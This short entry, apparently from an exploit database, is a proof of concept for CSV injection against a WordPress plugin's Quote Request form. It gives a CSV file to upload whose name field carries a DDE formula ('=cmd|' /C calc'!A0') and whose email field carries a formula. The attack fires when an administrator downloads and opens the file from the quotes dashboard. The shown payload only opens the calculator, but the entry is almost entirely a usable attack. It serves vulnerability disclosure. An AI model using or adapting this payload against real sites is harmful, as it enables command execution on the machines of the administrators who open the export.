## https://sploitus.com/exploit?id=WPEX-ID:6A3A573E-F9F2-45EC-9156-332CC551FC7E
On a page with a Quote Request form, upload the following CSV as an attachment:
"First Name","Last name","Email","Passport Number"
a,"=cmd|' /C calc'!A0","=1+2",d
The CSV injection will happen when an admin will download and open the CSV file from the All Quotes Dashboard